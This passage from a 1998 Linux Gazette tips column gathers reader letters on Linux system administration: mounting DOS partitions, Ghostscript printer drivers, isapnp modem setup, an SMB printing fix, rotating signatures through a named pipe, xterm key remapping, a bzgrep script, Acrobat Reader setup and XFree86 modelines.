3) Add the following line (changed to suit your system) to

 
   /etc/fstab:
     /dev/hda1  /C      vfat    uid=63,gid=63,umask=007 0 0
   
Of course, you have to locate your DOS partitions in the first place. This is done by issuing the following commands as 'root':
 
     /sbin/fdisk -l
     df
     cat /etc/fstab
The `fdisk -l` command lists all available devices. `df` shows which devices are mounted and how much is on them. And /etc/fstab lists all mountable devices. The devices remaining are either extended partitions (a kind of partition envelope, which you don't want to mount) or the partitions allocated to other operating systems, which you may want to mount.

4) Create a mount point for your DOS disk by issuing the following commands as root:

   mkdir /C
   chown dos:dos /C

With this setup, the C: drive is mounted at boot time to /C. Only root and ejy can read and write to it. Note that vfat in /etc/fstab works for vfat16 (and vfat32 natively for Linux 2.0.34 and above).

Enjoy...


Re: Canon BJC-250 question

Date: Fri, 2 Oct 1998 21:32:20 +0200 (CEST)
From:
In issue 33 of the Linux Gazette you wrote:
I have a Canon BJC-250 color printer. I have heard many people say that the BJC-600 printer driver will let me print in color. But I have not heard anyone say where I can get such a driver. I have looked everywhere but where it is. Can you help me?
When people are talking about printer drivers for Linux, they are mostly referring to a piece of code that enables the "Ghostscript" program to produce output on your printer.

Ghostscript is an interpreter of the Postscript page-description language. In the Unix world, it is kind of a lingua franca of talking to a printer. A lot of programs can produce Postscript output.

More expensive printers support Postscript in hardware, other printers need Ghostscript with a driver for that particular printer compiled in.

Invoke Ghostscript as "gs -?" to see a list of all the printers for which support is compiled in. If your printer is not in the list, use a driver for a printer from the same family. Otherwise you might have to compile GhostScript with another driver.

The Ghostscript 5.1 that I'm using (Debian distro) is compiled with the bjc600 driver.

Roland
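
As a quick test of that driver, one can bypass the print spooler and drive the printer directly. A sketch, assuming the printer sits on /dev/lp1 (the switches are described in the gs usage message shown by "gs -?"):

 
   gs -q -dNOPAUSE -sDEVICE=bjc600 -sOutputFile=/dev/lp1 file.ps -c quit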


Re: Help : Modem + HP

Date: Fri, 2 Oct 1998 21:20:58 +0200 (CEST)
From: Roland Smith,
In issue 33 of the Linux Gazette you wrote:
I have already spent hours trying to fix my Supra336 PnP internal modem and my HP DeskJet 720C under Linux! The result is always the same: no communication with the modem and no page printed on the HP printer! Could someone help me? I am close to giving up!
To use a Plug-and-Play device under Linux, you have to configure it. For that, you can use the isapnptools package. It will probably be included with your distribution.

Log in as root and execute the command "pnpdump > isapnp.conf". Now edit this file to choose sensible values for the parameters the modem requires; read the isapnp.conf man page. You might want to do "cat /proc/interrupts", "cat /proc/dma" and "cat /proc/ioports" to see which interrupts, DMA channels and I/O addresses are already in use. Once you're finished, copy the isapnp.conf file to /etc (as root). You can now configure the card by issuing the command "isapnp /etc/isapnp.conf" as root.
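
Collected into one place, that sequence looks like this (all as root):

 
   pnpdump > isapnp.conf
   cat /proc/interrupts /proc/dma /proc/ioports   # see what is already taken
   vi isapnp.conf                                 # pick free values for the modem
   cp isapnp.conf /etc
   isapnp /etc/isapnp.conf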

This probably must be done before the serial ports are configured. Look at the init(8) manpage, and see where the serial ports are configured in the system initialization scripts. Make sure that isapnp is called before the serial ports are configured.

If the modem is an internal one, you might have to disable one of the serial ports in your BIOS so the modem can use its address and interrupt.

Now, about the printer: AFAIK all HP *20 models are Windows-only printers. They use the host computer's CPU to perform all kinds of calculations that are normally done by the printer hardware, and therefore need a driver. Since HP doesn't release programming info on these devices, there will probably never be Linux drivers for these printers.

You should avoid this kind of brain-dead hardware (mostly referred to as "winprinters", or "winmodems").

Hope this helps :-)

Roland


Gnat and Linux: C++ and Java Under Fire LG #33

Date: Fri, 2 Oct 1998 14:47:46 -0400
From: "Terry Westley",

If you want the best of both worlds of Java and Ada, write applets targeted to the JVM in Ada! See these URLs for further info:

http://www.adahome.com/Resources/Ada_Java.html
http://www.buffnet.net/~westley/AdaJava/

--
Terry J. Westley


Re: Canon BJC-250 question

Date: Fri, 2 Oct 1998 10:21:52 -0500 (CDT)
From:
You asked:
I have a Canon BJC-250 color printer. I have heard many people say that the BJC-600 printer driver will let me print in color. But I have not heard anyone say where I can get such a driver. I have looked everywhere but where it is. Can you help me?
Most printing on Linux is handled through the use of the Ghostscript drivers. Ghostscript takes postscript input directed to it via the lpr command and converts it to the raw data streams that a particular output device can handle. Ghostscript can handle devices like printers but can also be used to display postscript files to your display (via the ghostview program).

To see if you have ghostscript installed, type the following:

 
% gs -v
"gs" is the command name for the ghostscript program (yes, it's really a program that has a bunch of output drivers compiled into it). The -v option asks it to print version information. If you have gs installed you'll see something like this:
 
Aladdin Ghostscript 4.03 (1996-9-23)
Copyright (C) 1996 Aladdin Enterprises, Menlo Park, CA.  All rights
reserved.
Usage: gs [switches] [file1.ps file2.ps ...]
Most frequently used switches: (you can use # in place of =)
 -dNOPAUSE           no pause after page   | -q       `quiet', fewer messages
 -g<width>x<height>  page size in pixels   | -r<res>  pixels/inch resolution
 -sDEVICE=<devname>  select device         | -c quit  (as the last switch)
                                           |            exit after last file
 -sOutputFile=<file> select output file: - for stdout, |command for pipe,
                                         embed %d or %ld for page #
Input formats: PostScript PostScriptLevel1 PostScriptLevel2 PDF
Available devices:
   x11 x11alpha x11cmyk x11mono deskjet djet500 laserjet ljetplus ljet2p
   ljet3 ljet4 cdeskjet cdjcolor cdjmono cdj550 pj pjxl pjxl300 bj10e bj200
   bjc600 bjc800 faxg3 faxg32d faxg4 pcxmono pcxgray pcx16 pcx256 pcx24b pbm
   pbmraw pgm pgmraw pgnm pgnmraw pnm pnmraw ppm ppmraw tiffcrle tiffg3
   tiffg32d tiffg4 tifflzw tiffpack tiff12nc tiff24nc psmono bit bitrgb
   bitcmyk pngmono pnggray png16 png256 png16m pdfwrite nullpage
Search path:
   . : /usr/openwin/lib/X11/fonts/Type1 : /usr/openwin/lib/X11/fonts/Type3 :
   /opt/AEgs/share/ghostscript/4.02 : /opt/AEgs/share/ghostscript/fonts
For more information, see /opt/AEgs/share/ghostscript/4.02/doc/use.txt.
Report bugs to [email protected]; use the form in new-user.txt.

This output comes from a version of ghostscript built for a Solaris system by someone other than myself. I don't know if this is the default set of devices you'll see on a Linux distribution or not.

The "available devices" say which devices you can use with gs. In this case the bubble jet 250 is not specifically listed (I suspect it would say bjc250, but I could be wrong), so I would (if I were using that particular printer) have to get the source and read the devices.txt file to find out if this printer is supported, either by its own driver or by one of the other drivers (perhaps the bjc600 supports it, for example).

This is the short explanation. To summarize, you'll need to familiarize yourself with Ghostscript and using lpr. If you're lucky and this printer is commonly supported by the various Linux distributions then you may already have this printer configured in the ghostscript you have installed on your box.
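
To tie gs into lpr, the usual arrangement is an input filter named in /etc/printcap. A sketch under assumptions (the filter path and /dev/lp1 are placeholders, and the bjc600 device must be in your gs build):

 
   #!/bin/sh
   # /usr/local/bin/ps2bjc -- turn PostScript on stdin into BJC-600 data on stdout
   exec gs -q -dSAFER -dNOPAUSE -sDEVICE=bjc600 -sOutputFile=- -

and the matching /etc/printcap entry:

 
   lp|bjc:\
           :lp=/dev/lp1:sd=/var/spool/lpd/lp:\
           :if=/usr/local/bin/ps2bjc:sh: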

For information on Ghostscript you'll need to look at the Ghostscript FAQ at http://www.cs.wisc.edu/~ghost/gsfaq.html. Note that there are two versions of Ghostscript: Aladdin's and the GNU version. Aladdin's is a commercial product but it's free for personal use. If you're not planning on redistributing it then I recommend the Aladdin version.

Okay, that's all the good news. I just checked the devices list at http://www.cs.wisc.edu/~ghost/aladdin/devices.html and it doesn't list the Canon Color Bubble Jet 250. If this printer is supported it's either with a newer, unlisted driver or by one of the other drivers. You'll probably need to check the .txt files that come with the source, find the author of the Color Bubble Jet drivers and drop them a line to see if they know if this printer will work with one of the existing drivers.

Hope that helps point you in the right direction.

Michael J. Hammel, The Graphics Muse


re: problem mounting vfat filesystem

Date: Fri, 2 Oct 1998 08:20:38 -0500 (CDT)
From: Scott Carlson,

Jan,
My /etc/fstab contains this line:

 
/dev/hda4     /f:  vfat    defaults,umask=007,gid=101        1 1
This mounts my DOS partition at /f: (to match its drive letter when I boot NT). It allows root, or anyone in group 101, to read or write the directory. I set up the 101 group so that only people in that group can write to /f:.

To allow everyone, change it to defaults,umask=000.

Scott Carlson


SMB Printing for users with spaces in their SMB username

Date: Tue, 06 Oct 98 14:31:42 -0800
From:

In order to get SMB printing to work under Red Hat Linux 5.1 with my username (which has a single space in it), I made the following addition to the Red Hat print filter "smbprint", located in /usr/lib/rhs/rhs-printfilters/smbprint:

 
USER="`echo $usercmd | awk '{printf "%s %s", $2,
$3}'`"%$password
usercmd=""
(The above lines were inserted just prior to the last line in the script, which on my system was):
 
(echo "print -"; cat) | /usr/bin/smbclient "$share"
$password -E ${hostip:+-I} $hostip -N -P $usercmd
2>/dev/null
This has the effect of setting the USER variable to "User Name"%password, where "User Name" is the name of the user as passed in to the script in the $usercmd variable. AWK is used to strip out the leading "-U" supplied as part of $usercmd somewhere up the command chain.

This solution only works for usernames with a single space in them. A more complex and full-featured solution would deal with no spaces or multiple spaces, either way. In any case, I feel Red Hat should find a general solution to this and incorporate it in their next release.

Warren

P.S. Thanks for a great forum for sharing tips and tricks for Linux. BTW, does Red Hat read these tips? I'd appreciate it if someone would submit this bug to them for fixing.


Generalized fix for SMB printing -- usernames w/spaces

Date: Wed, 07 Oct 98 06:38:02 -0800
From:

I wrote you earlier about a bug in Red Hat 5.1's /usr/lib/rhs/rhs-printfilters/smbprint

I later realized a simple generalized solution, by looking at the source code in more detail. The lines I added before can be replaced with:

 
export USER="$user"%$password
usercmd=""
(Just prior to the last line which calls smbclient).

For a more full-featured fix, modify the handling of $usercmd as follows:

1. Replace references to $usercmd with references to $USER.

2. Set and export $USER conditionally, as $usercmd is at present.

3. Remove $usercmd from usage entirely.

The only reliable way to pass a username/password to smbclient is via the USER environment variable.

1. The environment variable will not be seen on the cmd line by someone running ps, thus not exposing your password accidentally.

2. User names/passwords passed on the command line cannot contain spaces. If you embed them in quotes, smbclient keeps the quotes instead of trimming them off, causing username/password mismatch on the server. If you leave off the quotes, normal command-line parsing separates the username/password into separate parameters, and only the first word of each will get used.

Anyone using Red Hat print-filters will want to fix this, just in case they ever decide to set up SMB printing and are stuck with spaces in their username/password (as I am).

Warren E. Downs


2 Cent Tip -- Netscape

Date: Sun, 11 Oct 1998 10:37:37 +0200 (MET DST)
From: Hans-Joachim Baader,

We all use Netscape every now and then. Most people won't use it as a mail reader, since it is too bloated and the UNIX mail readers are generally much better.

Nevertheless, Netscape seems to create a directory nsmail in the user's home directory every time it starts and doesn't find one, even if mail is not used. This is annoying. Here's a trick which doesn't make the directory go away, but at least makes it invisible.

I didn't find a GUI equivalent to change this setting so you have to do the following:

Edit the file ~/.netscape/preferences.js and change all occurrences of 'nsmail' to '.netscape'. The important thing here is, of course, the leading dot before 'netscape'.
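
The same edit as a one-liner, for anyone with several accounts to fix (run it while Netscape is not running):

 
   sed 's/nsmail/.netscape/g' ~/.netscape/preferences.js > /tmp/prefs.js
   mv /tmp/prefs.js ~/.netscape/preferences.js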

Regards,
hjb


Cobol

Date: Wed, 14 Oct 1998 23:10:35 +1000
From: "John Leach",
To: [email protected]

I saw your request for help in the Linux Gazette re Cobol. I've been using AcuCobol for 2 years under Linux and I strongly recommend the product and the company.

I don't know the cost of the compiler because my company bought it - but email them and ask for a student copy; the worst they can do is refuse... They have a full development environment called 'AcuBench', which currently runs only under Windows.

The amazing thing about AcuCobol is that programs compiled on one platform will run totally unchanged on another machine - I tend to develop under Windows but install at client sites on Linux. I hope this has been helpful.

Regards
John Leach


Piped Signatures

Date: Fri, 16 Oct 1998 17:03:41 +0000
From: Colin Smith,

This has probably come up before, but the "more fun with pipes" thing in issue 33 reminded me of it.

Have a different signature appear in your emails every time you send one.

Create a subdirectory in your home directory called .signatures and copy your .signature file into it under a visible name. Delete your .signature file and create a pipe in its place using:

 
mkfifo .signature
Create a script which simply "cat"s each of the files in the .signatures directory out to the .signature pipe:
 
#!/bin/sh
while true
do
        for SIGNATURE in ${HOME}/.signatures/*
        do
                # Cat each file out to the .signature and throw away any errors.

                cat ${SIGNATURE} > ${HOME}/.signature 2> /dev/null

                # This sleep seems to be required for Netscape to work properly
                # I think buffering on the filesystem can cause multiple signatures
                # to be read otherwise. I think the sleep allows Netscape to see
                # the End Of File.

                sleep 1
        done
done
Have this script kick off in the background every time you log in to the system, from your profile or xsession. Add more entries to the .signatures directory and they will automatically get used in your emails.

Issues and problems:
One issue might be blocking on the pipe. If there is no process feeding signature files down the pipe, any programs which open the pipe can appear to hang until something is written.

--
Colin Smith


Fixing backspace and delete Key in X-windows

Date: Sun, 18 Oct 1998 17:40:28 +1000
From: "Steven K.H. Siew",

If you have installed Red Hat 5.0, you will have come across this problem: it will not take you long to realise that the backspace key (by this I mean the key above the ENTER key) and the delete key (by this I mean the key below the INSERT key and to the left of the END key) behave differently on the console than in an xterm under X.

This is extremely irritating if, like me, you work in both the text-only console and an xterm in X. I set about making sure that the behaviour is the same on both of them; in other words, I want them to be standardised.

My solution is to make the backspace, delete, pageup and pagedown keys behave exactly like they do in the text-only console.

The literature on how to do this is available on the web, but here I shall show the steps needed to achieve it, for those who have not done it yet. A word of warning! This is dangerous: you can potentially stuff things up very, very badly. In other words, you must do this extremely carefully (and make lots of backups).

For your information I included the links below where you may obtain more details about this matter.

http://www.best.com/~aturner//RedHat-FAQ/
http://www.ibbnet.nl/~anne/keyboard.html

Okay, now for the step-by-step instructions to fix the problem.

Step one
* * * is to create a directory to store the original files

 
ksiew > mkdir original-terminfo-file
ksiew > cd original-terminfo-file/
original-terminfo-file > pwd
/home/ksiew/original-terminfo-file

Step two
* * * is to save the original copy of the xterm terminfo file

 
original-terminfo-file > locate xterm | grep terminfo | grep x/xterm
/usr/lib/terminfo/x/xterm
/usr/lib/terminfo/x/xterm-bold
/usr/lib/terminfo/x/xterm-color
/usr/lib/terminfo/x/xterm-nic
/usr/lib/terminfo/x/xterm-pcolor
/usr/lib/terminfo/x/xterm-sun
/usr/lib/terminfo/x/xterms
/usr/lib/terminfo/x/xterms-sun
original-terminfo-file > cp /usr/lib/terminfo/x/xterm xterm.original
original-terminfo-file > ls -al
total 5
drwxrwxr-x   2 ksiew    ksiew        1024 Oct 18 15:35 .
drwxr-xr-x  24 ksiew    ksiew        2048 Oct 18 15:31 ..
-rw-rw-r--   1 ksiew    ksiew        1380 Oct 18 15:35 xterm.original
Step three
* * * is to obtain the xterm terminfo settings and save it into a file called "xterm" in the current directory

original-terminfo-file > infocmp xterm > xterm
original-terminfo-file > less ./xterm
#       Reconstructed via infocmp from file: /usr/lib/terminfo/x/xterm
xterm|vs100|xterm terminal emulator (X11R6 Window System), 
        am, km, mir, msgr, xenl, xon, 
        cols#80, it#8, lines#65, 
        acsc=``aaffggjjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..--++\
054\054hhII00, 
        bel=^G, bold=\E[1m, clear=\E[H\E[2J, cr=^M, 
        csr=\E[%i%p1%d;%p2%dr, cub=\E[%p1%dD, cub1=^H, 
        cud=\E[%p1%dB, cud1=^J, cuf=\E[%p1%dC, cuf1=\E[C, 
        cup=\E[%i%p1%d;%p2%dH, cuu=\E[%p1%dA, cuu1=\E[A, 
        dch=\E[%p1%dP, dch1=\E[P, dl=\E[%p1%dM, dl1=\E[M, 
        ed=\E[J, el=\E[K, enacs=\E(B\E)0, home=\E[H, ht=^I, 
        ich=\E[%p1%d@, ich1=\E[@, il=\E[%p1%dL, il1=\E[L, 
        ind=^J, 
        is2=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;3;4;6l\E[4l, 
        kbs=^H, kcub1=\EOD, kcud1=\EOB, kcuf1=\EOC, 
        kcuu1=\EOA, kend=\EOe, kent=\EOM, 
        kf1=\E[11~, kf10=\E[21~, kf11=\E[23~, kf12=\E[24~, 
        kf2=\E[12~, kf3=\E[13~, kf4=\E[14~, kf5=\E[15~, 
        kf6=\E[17~, kf7=\E[18~, kf8=\E[19~, kf9=\E[20~, 
        khome=\EO\200, kich1=\E[2~, kmous=\E[M, knp=\E[6~, 
        kpp=\E[5~, rc=\E8, rev=\E[7m, ri=\EM, rmacs=^O, 
        rmam=\E[?7l, rmcup=\E[2J\E[?47l\E8, rmir=\E[4l, 
        rmkx=\E[?1l\E>, rmso=\E[m, rmul=\E[m, rs1=^O, 
        rs2=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;3;4;6l\E[4l\E<, 
        sc=\E7, sgr0=\E[m, smacs=^N, smam=\E[?7h, 
        smcup=\E7\E[?47h, smir=\E[4h, smkx=\E[?1h\E=, 
        smso=\E[7m, smul=\E[4m, tbc=\E[3k, u6=\E[%i%d;%dR, 
        u7=\E[6n, u8=\E[?1;2c, u9=\E[c, 
Step four
* * * is to modify the file called "xterm" in the current directory to change the kbs setting and to insert a new kdch1 setting

Change from

 
        kbs=^H, kcub1=\EOD, kcud1=\EOB, kcuf1=\EOC, 
        kcuu1=\EOA, kend=\EOe, kent=\EOM, 
to
 
        kbs=\177, kcub1=\EOD, kcud1=\EOB, kcuf1=\EOC, 
        kcuu1=\EOA, kdch1=\E[3~, kend=\EOe, kent=\EOM, 
Step five
* * * is to create a .terminfo directory, set up the TERMINFO variable, set TERM to xterm, switch to the superuser and then recompile the "xterm" settings file
 
original-terminfo-file > mkdir ~/.terminfo

original-terminfo-file > export TERMINFO=~/.terminfo
If you are using tcsh, type instead
 
    original-terminfo-file > setenv TERMINFO ~/.terminfo

original-terminfo-file > export TERM=xterm
If you are using tcsh, type instead
 
    original-terminfo-file > setenv TERM xterm

original-terminfo-file > su
password: opensesame

#| tic xterm
Step six
* * * is to change to the ~/.terminfo/x/ directory and copy the xterm file to /usr/lib/terminfo/x/xterm
 
#| cd ~/.terminfo/x/
#| cp xterm /usr/lib/terminfo/x/xterm
#| cd ~
#| rm -rf .terminfo
#| exit
ksiew>
Step seven
* * * is to log off and log back on (this is to get rid of the TERMINFO variable) and change the .Xdefaults file
 
ksiew> logout
login: ksiew
password: opensesame
ksiew> less .Xdefaults
Output from less
Now change the last few lines from
 
xterm*VT100.Translations: #override\n\
        <KeyPress>Prior : scroll-back(1,page)\n\
        <KeyPress>Next : scroll-forw(1,page)
nxterm*VT100.Translations: #override\n\
        <KeyPress>Prior : scroll-back(1,page)\n\
        <KeyPress>Next : scroll-forw(1,page)
to the following lines
 
xterm*VT100.Translations: #override\n\
        <KeyPress>Prior : string("\033[5~")\n\
        <KeyPress>Next  : string("\033[6~")
nxterm*VT100.Translations: #override\n\
        <KeyPress>Prior : string("\033[5~")\n\
        <KeyPress>Next  : string("\033[6~")
*VT100.Translations: #override \
        <Key>BackSpace: string(0x7F)\n\
        <Key>Delete:    string("\033[3~")\n\
        <Key>Home:      string("\033[1~")\n\
        <Key>End:       string("\033[4~")
*ttyModes: erase ^?
That's it! Save the .Xdefaults file and now you can start X-windows and the backspace key, the delete key, the pageup key and the pagedown key will work just like in the text-only console window.
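To double-check that the new entry took effect, open a fresh xterm and ask infocmp for the two capabilities changed in step four (output abridged; it should match the edited lines):

 
ksiew > infocmp xterm | grep -e 'kbs=' -e 'kdch1='
        kbs=\177, kcub1=\EOD, kcud1=\EOB, kcuf1=\EOC, 
        kcuu1=\EOA, kdch1=\E[3~, kend=\EOe, kent=\EOM, 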

Steven


Creating a bzgrep Program

Date: Sun, 18 Oct 1998 17:35:43 +1000
From: "Steven K.H. Siew",

If you have ever used zgrep on gzipped text files, then you will have realised what a wonderful program it is. The program zgrep allows you to grep a text file even if the text file is compressed in gzip format. Not only that, it can also grep an uncompressed text file. For example, suppose you have the following directory:

 
testing > ls -al
total 2086
drwxrwxr-x   2 ksiew    ksiew        1024 Oct 18 11:07 .
drwxr-xr-x  24 ksiew    ksiew        2048 Oct 18 11:00 ..
-rwxrwxr-x   1 ksiew    ksiew     1363115 Oct 18 11:01 cortes.txt
-rwxrwxr-x   1 ksiew    ksiew      172860 Oct 18 11:01 lost_world_10.txt.gz
-rwxrwxr-x   1 ksiew    ksiew      582867 Oct 18 11:00 moon10a.txt
Then if you are looking for the word "haste",
 
testing > zgrep -l haste *
cortes.txt
lost_world_10.txt.gz
moon10a.txt
This tells you that "haste" is in all three files.

Now, if you compress a text file using the famous bzip2 compression program, you have a problem.

 
testing > bzip2 cortes.txt 
testing > ls -al
total 1098
drwxrwxr-x   2 ksiew    ksiew        1024 Oct 18 11:12 .
drwxr-xr-x  24 ksiew    ksiew        2048 Oct 18 11:12 ..
-rwxrwxr-x   1 ksiew    ksiew      355431 Oct 18 11:01 cortes.txt.bz2
-rwxrwxr-x   1 ksiew    ksiew      172860 Oct 18 11:01 lost_world_10.txt.gz
-rwxrwxr-x   1 ksiew    ksiew      582867 Oct 18 11:00 moon10a.txt
testing > zgrep -l haste *
lost_world_10.txt.gz
moon10a.txt
What happens now is that zgrep no longer recognises the file cortes.txt.bz2 as a compressed text file.

What we need is a new program, bzgrep, which can recognise bzip2-compressed text files.

The best way to create the bzgrep file is to modify the existing zgrep file.

 
testing > locate zgrep
/usr/bin/zgrep
/usr/man/man1/zgrep.1

testing > su
password: opensesame
#| cp /usr/bin/zgrep /usr/local/bin/bzgrep
The bzgrep file is now a copy of the zgrep file and contains the same text.

We can now change the last few lines to the following:

res=0
for i do
  if test $list -eq 1; then
    bzip2 -cdf "$i" | $grep $opt "$pat" > /dev/null && echo $i
    r=$?
  elif test $# -eq 1 -o $silent -eq 1; then
    bzip2 -cdf "$i" | $grep $opt "$pat"
    r=$?
  else
    bzip2 -cdf "$i" | $grep $opt "$pat" | sed "s|^|${i}:|"
    r=$?
  fi
  test "$r" -ne 0 && res="$r"
done
exit $res

Now the bzgrep file is a program that will be able to grep bzip2-compressed text files. BUT there is a problem.

The bzgrep program WILL NOT recognise ordinary text files or gzip-compressed text files. This is a major problem! It means you would have to compress all your text files with bzip2 in order to use the bzgrep program.

Luckily, there is always a solution in Linux. All we have to do is alter the program to be more choosy about which decompression program to use, i.e. whether it uses gzip -cdfq or bzip2 -cdf.

Now change the last few lines again to resemble this:

 
res=0
for i do
  case "$i" in

  *.bz2 )
      if test $list -eq 1; then
        bzip2 -cdf "$i" | $grep $opt "$pat" > /dev/null && echo $i
        r=$?
      elif test $# -eq 1 -o $silent -eq 1; then
        bzip2 -cdf "$i" | $grep $opt "$pat"
        r=$?
      else
        bzip2 -cdf "$i" | $grep $opt "$pat" | sed "s|^|${i}:|" 
        r=$?
      fi ;;

  * )
      if test $list -eq 1; then
        gzip -cdfq "$i" | $grep $opt "$pat" > /dev/null && echo $i
        r=$?
      elif test $# -eq 1 -o $silent -eq 1; then
        gzip -cdfq "$i" | $grep $opt "$pat"
        r=$?
      else
        gzip -cdfq "$i" | $grep $opt "$pat" | sed "s|^|${i}:|" 
        r=$?
      fi ;;
  esac
  test "$r" -ne 0 && res="$r" 
done
exit $res
Finally, these are the contents of a working bzgrep program.
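As a quick check, repeat the earlier search on the same test directory; since bzgrep now dispatches on the .bz2 suffix, you should expect all three files to be found again:

 
testing > bzgrep -l haste *
cortes.txt.bz2
lost_world_10.txt.gz
moon10a.txt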

Steve


Re: Linux on PalmPilot

Date: Sat, 17 Oct 1998 17:00:37 -0600 (MDT)
From: "Michael J. Hammel",
In a previous message, dino jose says:
Hi Mike, I read your article about Linux on the PalmPilot. It's very interesting. I am kind of new to the Linux platform, but I am very curious about Linux. I bought a PalmPilot III, the new version of the Palm with 2MB of memory. The main problem is, I don't know where to get the Linux operating system that runs on the PalmPilot III, the newer version. What about the Linux HOWTO documentation from its official site? Once I get this software, do I run it in the Linux operating system and then transfer it to the Palm III? I am kind of a novice in Linux. If you could help me, I would gladly appreciate it. Thanks a lot....
Actually, you don't run Linux on the PalmPilot itself (although there is a project to do so - I don't know much about that however). You run Linux on your PC and transfer data files between the Linux system and the Pilot. You still run the same programs you normally would *on* the PalmPilot - it's just that you can transfer these programs and their data files to the Pilot using tools on Linux.

Don't let using Linux confuse you. You use Linux in the same way you use Microsoft Windows - it runs on your PC to do word processing or spreadsheets or whatever. You then pass data files back and forth to the Pilot using special tools.

If you want to try out a program that helps transfer files back and forth, you can try my XNotesPlus. It's a sticky notes program that will allow you to do backups of your Pilot to your local hard disk, and will transfer the Address database from the Pilot for use in doing some simple printing of envelopes. You can download the program from http://www.graphics-muse.org/xnotes/xnotes.html. You will also need to get the PilotLink software that I described in the article you read. XNotesPlus uses PilotLink to do the actual data transfers to and from the Pilot.

Hope this helps.

Michael J. Hammel, The Graphics Muse


Red Hat 5.1 + Acrobat Reader 3.01 HOWTO

Date: Thu, 22 Oct 1998 22:55:27 -0400
From: Louis-Philippe Brais,

Some people I know went nuts trying to install Acrobat Reader 3.01 as a helper app in Netscape, as shipped with Red Hat Linux 5.1. Here's how I've done it:

1. Download Acrobat Reader 3.01 from ftp.adobe.com. Let the installer script install the whole thing under /usr/local/Acrobat3.

2. Create the following shell script: /usr/local/Acrobat3/bin/nsacroread

 
    #!/bin/sh
    unset LD_PRELOAD
    exec /usr/local/Acrobat3/bin/acroread "$@" >$HOME/.nsacroread-errors 2>&1

3. Don't forget to make this script executable:

 
    # chmod 755 /usr/local/Acrobat3/bin/nsacroread
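Before wiring it into Netscape, you can check that the wrapper works from a shell inside X (the PDF path here is just an example; any local PDF will do):

 
    $ /usr/local/Acrobat3/bin/nsacroread /tmp/sample.pdf
    $ cat $HOME/.nsacroread-errors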
4. If the directory /usr/local/lib/netscape doesn't already exist, create it.

5. Copy (exactly) the following two files into this directory.

mailcap:

 
      #mailcap entry added by Netscape Helper
      application/pdf;/usr/local/Acrobat3/bin/nsacroread -tempFile %s
mime.types:
 
      #--Netscape Communications Corporation MIME Information
      #Do not delete the above line. It is used to identify the file type.
      #
      #mime types added by Netscape Helper
      type=application/pdf  \
      desc="Acrobat Reader"  \
      exts="pdf" 

Note: You can do without the last two steps and instead configure the helper apps with the Edit >> Preferences menu of Netscape. This will create similar .mailcap and .mime.types files in the user's home dir. But IMHO the first method is best because this way you can configure Acrobat Reader for all users at once.

Cheers,
Louis-Philippe Brais


2 $.25 tips

Date: Thu, 22 Oct 1998 11:19:22 -0600
From: Bob van der Poel,

1. I was having some real problems with Netscape (3.04 Gold) the other day. No matter what I did, I could not get the helpers to work. Somewhere in the back of my mind, I knew that they had worked in the past, but I couldn't see anything that I'd changed. A few messages on various newsgroups turned on the lights: I had upgraded my Bash to 2.0.0--and this version has a bug in it. Expressions of the form ((..) .. ) are interpreted as arithmetic expressions, rather than nested sub-shells. Upgrading to 2.02.1(1) was almost painless and fixed the Netscape problem.

To get 2.02.1(1) go to the gnu site (www.gnu.org) and follow the links to the software sections. The new software should compile out of the box (it did for me). One problem I had was that the install script put the new binaries in /usr/local/bin, and since I had my old versions in /usr/bin they weren't found. A quick mv solved that.
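For the curious, here is a minimal illustration of the parsing ambiguity (the command Netscape actually runs is more elaborate; this is just a sketch):

 
    ((echo hello) 2>&1)
Bash 2.0.0 reportedly took the leading "((" as the start of an arithmetic expression and failed; 2.02.1 parses it as nested sub-shells again.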

2. For a number of years I've been struggling to read the results of color-ls on my xterm screens. A number of the colors (green and blue) were just too bright to read. I didn't want to turn down the brightness of my monitor...so I mostly just squinted. For some reason I was looking at the XTerm.ad file, and noticed that the colors could be adjusted! The XTerm.ad file should be located in /usr/lib/X11/app-defaults (or something similar). It is read each time a new xterm starts up and sets various options. If you look near the end of this file you'll see a number of definitions for the VT100 colors. I changed:

        *VT100*color2: green3
to
 
        *VT100*color2: green4
and
 
        *VT100*color6: cyan3
to
 
        *VT100*color6: cyan4
Like magic, the colors are darkened and I can read the results. If you don't want to fool with your global default file, you could also just add the entries to your ~/.Xresources file.
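For the per-user approach, the entries would look something like this (the resource names mirror the ones in XTerm.ad; run 'xrdb -merge ~/.Xresources' or restart X afterwards):

 
        ! additions to ~/.Xresources
        *VT100*color2: green4
        *VT100*color6: cyan4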

--
Bob van der Poel


S3 Virge/DX and XFree

Date: Mon, 26 Oct 1998 00:56:25 -0500 (EST)
From: "Andy K. Jalics",

I had an S3 ViRGE/DX, and couldn't get it working well in XFree86. This made me very mad, since there is a specific XF86_S3V (S3 ViRGE) server.

I used a borrowed Xaccel, but it made me feel guilty real quick. :) So I decided that I needed to get XFree86 configured well, and then ditch Xaccel. I found that xf86config cannot readily be used to configure a ViRGE.

Here are the modelines I use for a mid-range 17-inch monitor @ 16bpp using the SVGA server. *WARNING* If this blows up your monitor/card, it's not my fault, although it shouldn't.

 
   Modeline "640x480"    31.5   640  680  720  864   480  488  491  521
   ModeLine "640x480"    31.5   640  656  720  840   480  481  484  500 -HSync -VSync
   Modeline "640x400"     36     640  696  752  832   480  481  484 509 -HSync -VSync
   Modeline "800x600"     40     800  840  968 1056   600  601  605  628 +hsync +vsync
   Modeline "800x600"     50     800  856  976 1040   600  637  643  666 +hsync +vsync
   Modeline "800x600"    60.75  800  864  928 1088   600  616  621 657 -HSync -VSync
#  Modeline "1024x768"   85.00 1024 1032 1152 1360 768 784 787 823
   Modeline "1024x768"     85.00   1024 1052 1172 1320    768  780  783 803
#  Modeline "1152x864"   85.00   1152 1240 1324 1552   864  864  876  908
   Modeline "1152x864"     85.00   1152 1184 1268 1452    864  880  892 900
This cured me of using Xaccel, and should cure your S3 ViRGE blues. P.S. An S3 ViRGE can go up to 1600x1000?
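If you haven't hand-edited modelines before: they go in the Monitor section of your XF86Config (the path and the sync ranges below are illustrative; always use the figures from your own monitor's manual):

 
   Section "Monitor"
       Identifier  "Mid-range 17 inch"
       HorizSync   30-70
       VertRefresh 50-120
       Modeline "800x600"     50     800  856  976 1040   600  637  643  666 +hsync +vsync
   EndSection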

Andy


Published in Linux Gazette Issue 34, November 1998




This page maintained by the Editor of Linux Gazette,
Copyright © 1998 Specialized Systems Consultants, Inc.

"Linux Gazette...making Linux just a little more fun!"


News Bytes

Contents:


News in General


 December Linux Journal

